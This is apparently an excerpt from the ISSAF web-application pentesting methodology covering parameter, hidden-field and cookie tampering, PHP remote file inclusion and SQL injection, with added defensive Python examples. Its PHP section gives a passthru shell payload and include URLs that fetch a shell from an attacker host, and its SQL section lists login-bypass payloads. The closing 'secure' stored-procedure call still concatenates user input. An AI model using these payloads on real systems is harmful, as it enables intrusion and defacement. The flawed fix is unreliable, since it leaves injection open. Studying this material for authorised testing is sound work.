Analysis/Conclusion/Observation
• Valid transaction:
http://www.victim.com/tx?acctnum=12&debitamt=100
• Malicious transaction (the user rewrites a debit into a credit):
http://www.victim.com/tx?acctnum=12&creditamt=1000000
• Mitigation: accept only the parameters the page expects, decide server-side whether the account belongs to the logged-in user, and check the session token whenever parameters are sent.
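The following is an added example, not part of the ISSAF text: a hypothetical /tx handler that refuses the manipulated transaction above. The account table, the session store, the hostname and the parameter names are constructed for the example; in a real application the session token would travel in a cookie or header rather than in the URL.

```python
"""Added example (not part of the ISSAF text): a hypothetical /tx handler that
does not trust the acctnum/debitamt parameters shown above.  The account
table, session store, hostname and parameter names are constructed."""
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed server-side state.  The token is carried in the URL here only so
# that one string holds the whole request.
ACCOUNT_OWNER = {"12": "alice", "77": "bob"}
SESSIONS = {"alice": "tok-" + secrets.token_hex(8)}

# This page only ever debits; "creditamt" is not a parameter it understands,
# so it is refused instead of being interpreted.
ALLOWED_PARAMS = {"acctnum", "debitamt", "token"}
MAX_DEBIT = 10_000


def parse_params(url):
    """Flatten the query string to {name: first_value}."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}


def handle_tx(url, session_user):
    """Return ("ok", details) or ("reject", reason) for a /tx request made by
    the user that the server-side session identifies."""
    params = parse_params(url)

    # 1. Accept only the parameters this page expects.
    unknown = sorted(set(params) - ALLOWED_PARAMS)
    if unknown:
        return ("reject", "unexpected parameter(s): " + ", ".join(unknown))

    # 2. A state-changing request must carry the token issued to this
    #    session (constant-time compare so the check cannot be timed).
    expected = SESSIONS.get(session_user)
    supplied = params.get("token", "")
    if expected is None or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return ("reject", "missing or invalid session token")

    # 3. Authorisation is decided server-side: acctnum in the URL is only
    #    honoured if that account belongs to the session's user.
    acct = params.get("acctnum", "")
    if ACCOUNT_OWNER.get(acct) != session_user:
        return ("reject", "account %r is not owned by %r" % (acct, session_user))

    # 4. The amount must be a positive integer within the page's limit;
    #    isdecimal() rejects signs, decimals and empty strings.
    amt = params.get("debitamt", "")
    if not amt.isdecimal() or not 0 < int(amt) <= MAX_DEBIT:
        return ("reject", "debitamt must be an integer in 1..%d" % MAX_DEBIT)

    return ("ok", {"user": session_user, "account": acct, "debit": int(amt)})


def with_token(url, user):
    """Append the session token the server issued to `user`."""
    return url + "&token=" + SESSIONS[user]


if __name__ == "__main__":
    valid = "http://www.victim.com/tx?acctnum=12&debitamt=100"
    tampered = "http://www.victim.com/tx?acctnum=12&creditamt=1000000"
    print(handle_tx(with_token(valid, "alice"), "alice"))
    print(handle_tx(with_token(tampered, "alice"), "alice"))
    print(handle_tx(valid, "alice"))                      # no token at all
    print(handle_tx(with_token("http://www.victim.com/tx?acctnum=77&debitamt=5", "alice"), "alice"))
```

The order of the checks matters: unknown parameters are rejected before anything is parsed, the token is verified before any business data is read, and the account ownership test is the one that defeats a user who simply edits acctnum to somebody else's number.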
Countermeasures
Tool[s]
Further Reading[s]
Remarks
P.11.2 Hidden Form Fields Manipulation
Description
Web applications are stateless in nature. The easiest and most common way to preserve state is to store information in hidden form fields. However, these fields are not exactly hidden; they are merely not displayed to the user. Many applications use them to store merchandise prices, usernames or even passwords.
Some specific uses of hidden fields:
• insert the date and time the form was sent
• insert the URL where the form was filled out
• insert the referring document's URL
• redirect the user to a thank-you page after the form has been submitted
• thank the user with an alert
• send the session ID for session management
• carry values from a previous page which must be passed to the application but are not shown on the current page
A malicious user can easily save the HTML source of the page from a browser, change the hidden value and re-submit the form. The web server does not validate where the form came from, so it happily accepts the request and proceeds with the transaction using the changed values.
Alternatively, a local proxy such as Achilles can be used to modify the request in transit, as described in the previous section.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
• Never trust hidden input values.
• It is trivial to change them, as shown above; treat them exactly like any other user input.
• Never process unsanitized (unchecked) input directly at the server. For a price, for example, ignore the submitted value and use the price stored in the database or in a file.
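The following is an added example, not ISSAF's own code, showing both sides of a hidden price field: what an assessor extracts from the saved page source, and a hypothetical checkout handler that never uses the submitted price for the total but compares it with the catalog so tampering can be logged. The catalog, the order form and the field names are constructed.

```python
"""Added example (not ISSAF's own code): the two sides of a hidden price field.
`hidden_fields` is what an assessor does with the saved page source; `checkout`
is a hypothetical server handler that treats the field as untrusted.  The
catalog, the form and the field names are constructed."""
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed catalog: authoritative unit prices in cents.
CATALOG = {"SKU-100": 4999, "SKU-200": 1250}
MAX_QTY = 100

# Constructed order form as a browser would save it.  The price is "hidden"
# only in the sense that it is not rendered.
ORDER_FORM = """<form method="POST" action="/checkout">
<input type="hidden" name="sku" value="SKU-100">
<input type="hidden" name="price" value="4999">
Quantity: <input type="text" name="qty" value="1">
<input type="submit" value="Buy">
</form>"""


class HiddenFieldExtractor(HTMLParser):
    """Collect every <input type="hidden"> name/value pair from page source."""

    def __init__(self):
        super().__init__()
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "hidden":
            self.hidden[a.get("name", "")] = a.get("value", "")


def hidden_fields(html):
    p = HiddenFieldExtractor()
    p.feed(html)
    return p.hidden


def tamper(fields, **changes):
    """Build the POST body the attacker re-submits after editing the saved page."""
    merged = dict(fields, **changes)
    return "&".join("%s=%s" % (k, v) for k, v in merged.items())


def checkout(post_body):
    """Process the order.  The submitted price is never used for the total;
    it is only compared against the catalog so that tampering can be logged."""
    form = {k: v[0] for k, v in parse_qs(post_body, keep_blank_values=True).items()}
    sku = form.get("sku", "")
    if sku not in CATALOG:
        return ("reject", "unknown sku %r" % sku)
    qty = form.get("qty", "")
    if not qty.isdecimal() or not 1 <= int(qty) <= MAX_QTY:
        return ("reject", "qty must be an integer in 1..%d" % MAX_QTY)
    unit = CATALOG[sku]                     # the authoritative value
    submitted = form.get("price")
    tampered = submitted is not None and submitted != str(unit)
    return ("ok", {"sku": sku, "qty": int(qty), "total": unit * int(qty),
                   "price_tampered": tampered})


if __name__ == "__main__":
    fields = hidden_fields(ORDER_FORM)
    print(fields)                                        # {'sku': 'SKU-100', 'price': '4999'}
    print(checkout(tamper(fields, qty="2")))             # honest order
    print(checkout(tamper(fields, price="1", qty="2")))  # price edited to one cent
```

The tampered order still totals 9998 cents because the handler re-derives the price from the catalog; the price_tampered flag is worth logging, since a mismatch is a reliable indicator of somebody editing the form.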
Tool[s]
Further Reading[s]
Remarks
P.11.3 Cookie Manipulation
Description
Cookies are small pieces of information which the server sends to the client for different purposes. The main aim of a cookie is to identify the client. There are two types of cookies.
1) Persistent Cookie
Persistent cookies are pieces of information generated by a web server and stored on the client computer until they expire, ready for future access. Cookies travel in HTTP headers (Set-Cookie from the server, Cookie from the browser) with every request to the issuing site, and the browser keeps sending a persistent cookie after the computer has been disconnected from the Internet or restarted. Servers normally use this type of cookie to keep user information (www.amazon.com, for example). These cookies are simply written to a text file, so it is quite easy to play with them. Each browser stores its cookies in a fixed location on the client computer, so it takes little effort for a malicious user to find them. A malicious user can search the cookies stored on the client's PC and, by changing their values, gain unauthorized access to other users' accounts.
An attacker can manipulate cookies in the following ways:
• Explicitly, with a CGI program.
• Programmatically, with client-side JavaScript using the cookie property of the document object.
• Transparently, with the LiveWire client objects, when using client-cookie maintenance.
2) Session Cookie
Session cookies are the cookies a server normally uses for authentication. In a way session cookies are more secure than persistent cookies: the browser discards them when it closes, and the server should invalidate its own session entry as soon as the session expires. It is frequently found, however, that a server still accepts (and lets the client change) a session cookie after the session should have expired.
Basic Elements of a Cookie
• A cookie has 7 key attributes (the fields of the Netscape cookies.txt format): domain, flag, path, secure, expiration, name, value.
• A cookie cannot exceed 4 KB.
• Cookies are of two types:
– Persistent cookies, which reside on the client's hard drive for a specific period of time.
– Non-persistent cookies, which are session specific and deleted as soon as the session is over.
Use of Cookies
• Store and manipulate any information you explicitly provide to a site.
• Manage the session between various pages.
• Track your interaction with the parent site, such as pages visited, number of visits and time of visit.
• A site can record any information available to the web server about the client, including IP address, operating system, browser type etc.
A typical cookie algorithm
Cookie Manipulation
• If cookies are not securely encoded (signed or encrypted), an attacker can modify them.
• Example: "poisoning" the cookie (changing the user ID and timestamp it carries).
• Risks: bypassing authentication, gaining access to the accounts and information of other users.
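The following is an added example, not from the ISSAF text. It puts the poisonable cookie described above (user ID and timestamp stored in the clear) beside a tamper-evident version of the same cookie: the fields stay readable, but an HMAC-SHA256 over them is appended and the timestamp is bounded by a lifetime, so an edited user ID or a replayed, expired cookie is rejected. The secret, the user IDs and the timestamps are constructed.

```python
"""Added example (not from the ISSAF text): a cookie that carries a user id
and timestamp in the clear, beside a tamper-evident version of the same cookie
signed with HMAC-SHA256 and bounded by a lifetime.  The secret, the user ids
and the timestamps are constructed."""
import hashlib
import hmac
import time
from urllib.parse import parse_qsl, urlencode

SECRET = b"constructed-server-secret-rotate-me"   # constructed; keep real keys out of source
MAX_AGE = 30 * 60                                  # seconds a cookie stays valid
CLOCK_SKEW = 60                                    # tolerated future-dated ts


def parse_naive_cookie(value):
    """The weak design: whatever userid the cookie says, the server believes."""
    fields = dict(parse_qsl(value))
    return int(fields["userid"])


def poison(cookie, field, new_value):
    """What the attacker does: edit one field of the cookie text (in the
    browser's cookie file or with a local proxy)."""
    edited = [(k, new_value if k == field else v) for k, v in parse_qsl(cookie)]
    return "&".join("%s=%s" % kv for kv in edited)


def issue_cookie(userid, now=None):
    """Signed design: userid and ts stay readable, but a MAC over them is appended."""
    now = int(time.time() if now is None else now)
    payload = urlencode({"userid": int(userid), "ts": now})
    mac = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return payload + "&mac=" + mac


def verify_cookie(value, now=None):
    """Return the userid if the cookie is authentic and fresh, else None."""
    now = int(time.time() if now is None else now)
    payload, sep, mac = value.rpartition("&mac=")
    if not sep:
        return None                                   # no MAC at all
    expected = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected.encode(), mac.encode()):
        return None                                   # edited userid/ts, or forged MAC
    fields = dict(parse_qsl(payload))
    try:
        userid, ts = int(fields["userid"]), int(fields["ts"])
    except (KeyError, ValueError):
        return None
    if ts > now + CLOCK_SKEW or now - ts > MAX_AGE:
        return None                                   # replayed after expiry, or future-dated
    return userid


if __name__ == "__main__":
    t0 = 1_700_000_000
    weak = "userid=42&ts=%d" % t0
    print(parse_naive_cookie(poison(weak, "userid", "1")))       # 1: attacker is now user 1
    signed = issue_cookie(42, now=t0)
    print(verify_cookie(signed, now=t0 + 10))                     # 42
    print(verify_cookie(poison(signed, "userid", "1"), now=t0))   # None
    print(verify_cookie(signed, now=t0 + MAX_AGE + 1))            # None: expired
```

Signing makes the cookie tamper-evident, not secret: the user ID is still readable. If the contents must also be hidden, encrypt the payload with an authenticated mode; either way the server still has to keep its own record of which sessions are live if it wants to revoke one before the lifetime runs out.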
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
P.12 VULNERABILITY IDENTIFICATION
P.12.1 Check vulnerabilities associated with web server version
Description
Every web server has its own vulnerabilities, and new ones are published as the days pass. It is necessary to check all of them once the target web server has been identified. Some well-known examples are the DefaultNav issue on Lotus Domino and the Unicode and Double Decode directory traversal vulnerabilities on IIS.
More information on vulnerabilities can be found at www.securityfocus.com and www.securityportals.com.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
P.12.2 Run Automated Web Vulnerability Scanner
Description
Many tools check web servers for known vulnerabilities. Examples are Whisker, WebScan, NTOSpider, GFI LANguard and Nessus.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
• WebScan, NTOSpider, Nessus, GFI LANguard
Further Reading[s]
Remarks
P.12.3 Check vulnerabilities associated with modules running on web server
Description
Many times the web server itself has no vulnerability, or is fully patched, but a module running on it does. Such a module can be exploited to compromise the web server; a recent OpenSSL vulnerability is one example.
More information on vulnerabilities can be found at www.securityfocus.com and www.securityportals.com.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
P.13 INPUT VALIDATION
It is important to check input validation for any application. If an application validates all of its input, the chances that it exposes unnecessary information are very small. The simple rule is: "Accept only the data you are expecting, and deny anything you do not understand." Input validation has to be checked in the following manner:
1) Validate data
2) Buffer overflow
P.13.1 Validate data
Description
A web application has to validate each and every input it accepts from the user. Price and quantity fields, for example, cannot accept negative values. For every field the application should check both the data type it expects from the client and the value it expects.
Many times the web developer validates the posted information on the client side before posting it to the server, typically in JavaScript or VBScript pages. A user can very easily bypass this validation by modifying the request after the browser has validated it and before it reaches the server. A tool such as Achilles can be used for this purpose.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
• Achilles, Paros
Further Reading[s]
Remarks
P.13.2 Test Buffer overflow
Description
In simple language, a buffer overflow means supplying more data in a field than the application is expecting. If the size of a field is validated only on the client side, the field can be used for a buffer overflow attack: the user bypasses the client-side validation by modifying the request after the browser has validated it and before it reaches the server. A tool such as Achilles can be used for this purpose.
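The following is an added example, not ISSAF's own code, covering P.13.1 and P.13.2 together: a server-side validator that checks length, type, range and character set for every field the page expects and denies anything else, plus the oversized request body an assessor submits through a local proxy to see whether the server enforces its own length limit. The form fields, the limits and the sample bodies are constructed.

```python
"""Added example (not ISSAF's own code): server-side validation of the kind the
client-side JavaScript/VBScript checks cannot replace, plus the oversized
request body an assessor sends through a local proxy to test it.  The form
fields, limits and sample bodies are constructed."""
import math
import re
from urllib.parse import parse_qs

# Constructed schema: every field the page expects, and nothing else.
SCHEMA = {
    "name":  {"type": str,   "maxlen": 40, "pattern": r"[A-Za-z][A-Za-z .'-]*"},
    "qty":   {"type": int,   "maxlen": 4,  "min": 1,    "max": 100},
    "price": {"type": float, "maxlen": 12, "min": 0.01, "max": 1e6},
}


def validate(body, schema=SCHEMA):
    """Parse a form-encoded body against `schema`.
    Returns (clean, errors); `clean` holds typed values only when `errors` is empty."""
    raw = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    clean, errors = {}, []

    for field in raw:                       # deny what we do not understand
        if field not in schema:
            errors.append("%s: unexpected field" % field)

    for field, rule in schema.items():
        if field not in raw:
            errors.append("%s: missing" % field)
            continue
        value = raw[field]
        # Length first, before any parsing touches the data: the server-side
        # counterpart of the client-side size check.
        if len(value) > rule["maxlen"]:
            errors.append("%s: too long (%d > %d)" % (field, len(value), rule["maxlen"]))
            continue
        try:
            typed = rule["type"](value)
        except ValueError:
            errors.append("%s: not a valid %s" % (field, rule["type"].__name__))
            continue
        # float("nan") and float("1e999") parse fine but defeat every range check.
        if isinstance(typed, float) and not math.isfinite(typed):
            errors.append("%s: not a finite number" % field)
            continue
        if "min" in rule and typed < rule["min"]:
            errors.append("%s: below minimum %s" % (field, rule["min"]))
            continue
        if "max" in rule and typed > rule["max"]:
            errors.append("%s: above maximum %s" % (field, rule["max"]))
            continue
        if "pattern" in rule and not re.fullmatch(rule["pattern"], typed):
            errors.append("%s: unexpected characters" % field)
            continue
        clean[field] = typed

    return (clean if not errors else {}), errors


def overflow_probe(field, length=5000, filler="A"):
    """Body an assessor submits (bypassing the browser) to see whether the
    server enforces its own length limit on `field`."""
    return "%s=%s" % (field, filler * length)


if __name__ == "__main__":
    print(validate("name=Bob&qty=3&price=9.99"))
    print(validate("name=Bob&qty=-3&price=9.99"))                 # negative quantity
    print(validate(overflow_probe("name") + "&qty=1&price=1"))   # 5000-byte name
    print(validate("name=Bob&qty=1&price=nan"))                  # NaN slips past < and >
    print(validate("name=Bob&qty=1&price=1&admin=1"))            # field the page never asked for
```

Two details are easy to miss when the validation is only copied from the client side: the length check has to run before the value is parsed, and numeric parsers accept "nan" and "inf", which compare false against every minimum and maximum.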
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
• Achilles, Paros
Further Reading[s]
Remarks
P.13.3 PHP Insertion
PHP is a widely used language in web applications. It has many of the features found in high-level programming languages today, for example transparent memory management, a syntax similar to C, simplicity for common tasks (file management and string parsing) and a full-featured API with functions that let coders access the most popular database servers very easily.
PHP configuration is specified in php.ini, which resides in /windows or /winnt (in Windows environments) or in /etc/ in the Unix world. If the web server that executes the scripts is Apache Win32, a copy of php.ini must also be present in the install direct directory.
There are two options in the configuration file that, when activated, allow the attack to be carried out:
- allow_url_fopen = On: if this option is on, it is possible to open files located on remote servers (using the http or ftp protocols) through fopen()
- register_globals = On: if this option is on, the values of variables used in PHP code can be set from the parameters of an HTML form (you can set PHP variables using HTML)
As long as these two options are on, and one script in the application has the structure shown next, it is possible to make the web server include and execute arbitrary PHP code fetched from a remote location. In this situation arbitrary commands can be run remotely with the privileges of the UID running the script.
The products listed below were vulnerable to this type of attack:
- osCommerce: e-commerce solution that lets you create a web-based online store
- Zeroboard: web-based bulletin board manager, with the usual functionality of an Internet forum
- phpBB: web-based BBS manager
Now it is time to analyze the vulnerable scripts in these products.
In osCommerce, the vulnerable script is include_once.php:
<?
if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
    include($include_file);
}
?>
This script is used frequently in different parts of the application. The developers tried to encapsulate the code-insertion functionality in include_once.php, so that when you need to insert a fragment of code this script is included first and it takes care of including the one you specify (it also defines a symbol to avoid including the same code more than once). Note that the script never sets $include_file itself; with register_globals on, a request parameter of the same name sets it.
As an example, this is part of product_reviews.php:
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF">
<!-- header //-->
<? $include_file = DIR_WS_INCLUDES . 'header.php'; include(DIR_WS_INCLUDES . 'include_once.php'); ?>
<!-- header_eof //-->
Here we can confirm the code-insertion strategy explained above.
Once the script has been analyzed, exploitation is trivial. You just have to bring up a web server on the machine from which you plan to attack and host one PHP file with the code you would like to execute. For example:
<? passthru ("<command>") ?>
With passthru we get a PHP-based shell on the vulnerable web server: we can execute any command and see its output:
http://servidor_vulnerable/catalog/includes/include_once.php?include_file=http://atacante/shell.php
The same error, although with a slightly different structure, is found in phpBB 2.0.1. The install.php script completes the installation process, makes some checks and creates the database which will be used as the content backend. Besides, the administrator can make configuration changes after authentication. Here is a fragment of the vulnerable code:
include($phpbb_root_dir . 'includes/functions_selects.'.$phpEx);
Again, if register_globals and allow_url_fopen are on, it is possible to include PHP code coming from another web server, with just one added limitation: in this case the name of the included script must be functions_selects.php, and the file must be located in an includes directory on the attacker's server:
http://servidor_vulnerable/install.php?phpbb_root_dir=http://atacante/
The last example is ZeroBoard. The vulnerable script is _head.php, which performs a code insertion very similar to the one in the previous example, but now the script must be named alib.php:
http://servidor_vulnerable/_head.php?_zb_path=http://atacante/
Now we build our own scenario in which to test the vulnerability. The vulnerable script is include_once.php, the same as in osCommerce:
<?
if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
    include($include_file);
}
?>
This is the main page, which we want to deface:
<Diagram>
The code we want to execute on the vulnerable server is:
<? passthru ("echo defaced_web! > indice.html"); ?>
Now we just have to access a URL like this one:
http://10.0.1.1/include_once.php?include_file=http://10.0.1.2/ataque.php
We have managed to change the content of the main web page:
<Diagram>
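The following is an added example, not part of the ISSAF text: a small static check for the two conditions this section describes. It parses php.ini for allow_url_fopen and register_globals (falling back to PHP's own defaults when a directive is absent) and scans PHP source for include/require statements whose path contains a variable, which is the structure of the vulnerable scripts above. The php.ini fragment and the file names are constructed; the PHP lines are copies of the osCommerce and phpBB snippets quoted in the text.

```python
"""Added example (not part of the ISSAF text): a static check for the two
conditions described above.  It parses php.ini for allow_url_fopen and
register_globals and scans PHP source for include/require statements whose
argument is a variable.  The php.ini fragment and the file names are
constructed; the PHP lines are copies of the snippets quoted above."""
import re

# include/require with or without parentheses; the argument is captured.
INCLUDE_RE = re.compile(
    r"\b(include_once|require_once|include|require)(?![A-Za-z0-9_])\s*\(?\s*([^;]+?)\s*\)?\s*;",
    re.S,
)

# PHP's own defaults when a directive is absent from php.ini (PHP 4.2+).
PHP_DEFAULTS = {"allow_url_fopen": "on", "register_globals": "off"}
TRUE_VALUES = {"on", "1", "true", "yes"}


def parse_php_ini(text):
    """Return {directive: value} with comments and section headers stripped."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()          # ';' starts a comment
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip().lower()] = value.strip().strip('"').lower()
    return conf


def directive_on(conf, name):
    return conf.get(name, PHP_DEFAULTS[name]) in TRUE_VALUES


def find_variable_includes(php_source):
    """Return [(line, statement, argument)] for includes whose path contains a '$'."""
    findings = []
    for m in INCLUDE_RE.finditer(php_source):
        stmt, arg = m.group(1), m.group(2).strip()
        if "$" in arg:
            line = php_source.count("\n", 0, m.start()) + 1
            findings.append((line, stmt, arg))
    return findings


def rfi_exposure(php_ini_text, sources):
    """Combine both checks; `sources` maps file name -> PHP source text."""
    conf = parse_php_ini(php_ini_text)
    report = {
        "allow_url_fopen": directive_on(conf, "allow_url_fopen"),
        "register_globals": directive_on(conf, "register_globals"),
        "variable_includes": {},
    }
    for name, src in sources.items():
        hits = find_variable_includes(src)
        if hits:
            report["variable_includes"][name] = hits
    report["meets_issaf_conditions"] = (report["allow_url_fopen"]
                                        and report["register_globals"]
                                        and bool(report["variable_includes"]))
    return report


# Constructed php.ini fragment with both dangerous settings enabled.
SAMPLE_PHP_INI = """[PHP]
; File access
allow_url_fopen = On   ; lets include() fetch http:// and ftp:// URLs
register_globals = On  ; request parameters become PHP variables
display_errors = Off
"""

# The osCommerce and phpBB lines quoted in the text, plus a constructed safe file.
SAMPLE_SOURCES = {
    "includes/include_once.php": """<?
if (!defined($include_file . '__')) {
  define($include_file . '__', 1);
  include($include_file);
}
?>""",
    "install.php": "<? include($phpbb_root_dir . 'includes/functions_selects.'.$phpEx); ?>",
    "safe.php": "<? include('includes/header.php'); require_once 'config.php'; ?>",
}

if __name__ == "__main__":
    import pprint
    pprint.pprint(rfi_exposure(SAMPLE_PHP_INI, SAMPLE_SOURCES))
```

A variable in an include path is only a lead, not a finding on its own: the assessor still has to confirm that the variable can be set from the request (through register_globals, or directly from $_GET/$_POST in later code) and that the configured php.ini is the one the running server actually loads.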
P.14 TEST SQL INJECTION
Description
SQL injection is a technique through which an attacker can create or alter existing SQL commands (by using some special characters) to gain access to important data, or even the ability to execute system-level commands on the server. SQL injection is the result of poor input validation and can be blocked by proper input validation.
Purpose
SQL injection occurs when an attacker is able to insert a series of SQL statements into a query by manipulating the data input into an application. Applications that do not correctly validate and/or sanitize user input can potentially be exploited in several ways:
• Changing SQL values.
• Concatenating SQL values.
• Adding function calls and stored procedures to a statement.
• Typecasting and concatenating retrieved data.
• Adding system functions and procedures to find out critical information about the server.
Test Environment
The test environment developed by us is very simple: Microsoft SQL Server 2000 as the database management system, a web server and an authentication web site. It also contains two ASP pages, one for gathering user input and another for checking the input against the data in the database using an SQL query.
Architecture
The test environment is based on the two-tier architecture. A diagram of a typical two-tier architecture is shown below:
<Diagram>
In a two-tier architecture a client talks directly to a server, with no intervening server. It is typically used in small environments (fewer than 50 users).
Some important characteristics of a two-tier application are:
• User interface on clients (desktops).
• Database on servers (more powerful machines).
• Business logic residing mostly on clients.
• Stored procedures for data access on the servers.
• SQL used for communication.
Database Management System: Microsoft SQL Server 2000
Database Name: Injection
Table Name: Authentication
Table Structure:
  Slno      Integer (4)
  Name      Character (20)
  Password  Character (20)
Front-end Structure:
Authentication Page: [Login.asp]
This page is designed to take user input. There are two text boxes on the page with one submit button. When the user clicks the submit button, the values of the text boxes are submitted to the verify.asp page on the server.
Objective
• Bypassing authentication
• Retrieving the database structure
• Understanding execution of DML statements
P.14.1 Methodology
• Check SQL injection vulnerability
• Bypass user authentication
• Get control of the database
• Get control of the host
• Map the internal LAN and get data from other hosts
• Attack other operating systems
P.15 TEST SERVER SIDE INCLUDE
[Text]
P.16 GLOBAL COUNTERMEASURES
• Log out of all sessions when done.
• Do not select the "Remember me" option.
• Protect your cookies: desktop security matters, since stored cookies are plain files.
• Ensure you use SSL when given the choice of standard / secure login.
• Patch your browser to be safe from some nasty cross-site scripting attacks.
• Treat e-mails with session ID information in URLs just as securely as usernames/passwords.
• Patch your web server regularly.
• Make sure that your web server exposes as few details as it can.
• Keep an eye on the server logs; if you find continuous malicious requests from a specific IP, block that IP.
P.17 FURTHER READING[S]
Web Hacking – Attacks and Defense, by Saumil Shah and Shreeraj Shah
Hacking Exposed – Web Edition, by Stuart McClure
Q WEB APPLICATION SECURITY (CONTINUED) – SQL INJECTIONS
Q.1 DESCRIPTION
SQL injection is a technique through which an attacker can create or alter existing SQL commands (by using some special characters) to gain access to important data, or even the ability to execute system-level commands on the server. Additionally, after getting control of the server, other SQL servers can be mapped. SQL injection is the result of poor input validation and can be blocked by proper input validation.
Q.2 PURPOSE
SQL injection occurs when an attacker is able to insert a series of SQL statements into a query by manipulating the data input into an application. Applications that do not correctly validate and/or sanitize user input can potentially be exploited in several ways:
• Changing SQL values.
• Concatenating SQL values.
• Adding function calls and stored procedures to a statement.
• Typecasting and concatenating retrieved data.
• Adding system functions and procedures to find out critical information about the server.
Q.3 TEST ENVIRONMENT
The test environment developed by us is very simple: Microsoft SQL Server 2000 as the database management system, a web server and an authentication web site. It also contains two ASP pages, one for gathering user input and another for checking the input against the data in the database using an SQL query.
Architecture
The test environment is based on the two-tier architecture. A diagram of a typical two-tier architecture is shown below:
<Diagram>
In a two-tier architecture a client talks directly to a server, with no intervening server. It is typically used in small environments (fewer than 50 users). Some important characteristics of a two-tier application are:
• User interface on clients (desktops).
• Database on servers (more powerful machines).
• Business logic residing mostly on clients.
• Stored procedures for data access on the servers.
• SQL used for communication.
Database Management System: Microsoft SQL Server 2000
Database Name: Injection
Table Name: Authentication
Table Structure:
  Slno      Integer (4)
  Name      Character (20)
  Password  Character (20)
Front-end Structure:
Authentication Page: [Login.asp]
This page is designed to take user input. There are two text boxes on the page with one submit button. When the user clicks the submit button, the values of the text boxes are submitted to the verify.asp page on the server.
Q.4 TERMINOLOGY
[Text]
Q.5 OBJECTIVE
• Bypassing authentication
• Retrieving the database structure
• Understanding execution of DML statements
• Executing operating system commands
• Mapping the internal network
Q.6 EXPECTED RESULT
[Text]
Q.7 METHODOLOGY / PROCESS
Q.7.1.1 CHECK SQL INJECTION VULNERABILITY
To find out whether a site is vulnerable to SQL injection, try the following special characters in the input:
'
;
,
''
%
-
*
Q.7.1.2 BYPASS USER AUTHENTICATION
1. ' or 1=1); --
2. 'OR''='
3. ' any_bad_value
4. ' "
5. ' "or"
6. 'admin'--
7. "any_bad_value" ' etc.
Q.7.1.3 GET CONTROL OVER DATABASE
1. Getting the name of the table (using the HAVING clause)
2. Getting all columns of the table (using the GROUP BY clause)
3. Determining the number of columns (using the UNION clause)
4. Finding data types (using aggregate functions)
5. Getting usernames and passwords from the table
6. Inserting values into the table
7. Updating values of the table
8. Deleting all data from the table (using DELETE or DROP statements)
9. Displaying desired information from the table in the browser
Q.7.1.4 GET CONTROL ON HOST
1. Getting the server name
2. Executing commands on the server
3. Shutting down the SQL Server
4. Brute-forcing the SQL Server password
5. Retrieving data through SQL injection
6. xp_regread and xp_regwrite extended procedures
7. xp_servicecontrol extended procedure
Q.7.1.5 MAP INTERNAL NETWORK
Q.7.1.6 RUN AUTOMATED SCANNER
In case you have not found an SQL injection vulnerability you can run an automated scanner. This can also be done after performing all the tests mentioned above, to cover other holes which may have been missed during the manual assessment.
Q.8 CHECK SQL INJECTION VULNERABILITY
The first step before performing SQL injection is to test whether the site is vulnerable to it at all. This is done by supplying specially crafted input: if the input results in a database error message or an abnormal web page, the site is vulnerable to SQL injection. To find out, try the following special characters in the input:
'
;
,
''
%
-
*
Note:
It is frequent to see web applications built in such a way that, on any error, they show a generic message, redirect the user to the home page or just refresh the last page visited. The effect is usually that, although the SQL injection is happening, its result is not shown to the assessor. Some of the techniques specified here were developed to confront this situation, commonly known as "blind SQL injection". In any case, a proxy-type application can always be used to intercept the HTTP traffic in search of intermediate responses (redirects, error pages), so that the SQL injection vulnerability can still be confirmed.
Q.9 BYPASSING USER AUTHENTICATION
Description
This step can be used to bypass the authentication without providing a valid username and password.
Objective
To bypass the authentication without providing a valid username and password.
Expected Result
An attacker gets unauthorized access to the web site without providing credentials.
Step-by-step explanation
An attacker can easily bypass the login page without providing a valid user name and password. He just needs to enter:
' or 1=1--      (in the User Name text box)
On submitting the page, the SQL query at the server becomes:
select * from authentication where name = '' or 1=1--' and password = ''
Note:
MS SQL Server treats anything after -- as a comment, so the rest of the query is ignored.
Even if a site is vulnerable to SQL injection, this exact payload will often not work, since it entirely depends upon the way the ASP code is written. Try all of the following combinations:
1. ' or 1=1; --
2. ' or 1=1); --
3. 'OR''='
4. ' any_bad_value
5. ' "
6. ' "or"
7. 'admin'--
8. " any_bad_value" ' etc.
Note:
These injections will not always produce a positive effect. The effect of SQL injection depends on how the web application is programmed.
Securing against illegal authentication
To restrict illegal authentication, one may call a stored procedure (passing the username as its parameter) instead of building the complete SQL query from the query string, for example:
Set Recordsource = connectionstring.Execute("exec logincheck '" & Request.QueryString("username") & "'")
Now trying to bypass this code by supplying ' or 1=1' as the username will not work. An EXEC statement takes a parameter list, not a WHERE clause, so the injected OR is a syntax error:
Microsoft OLE DB Provider for ODBC drivers error '80040e14'
[Microsoft][ODBC SQL Server] Incorrect syntax near the keyword 'or'.
/verify1.asp, line 5.
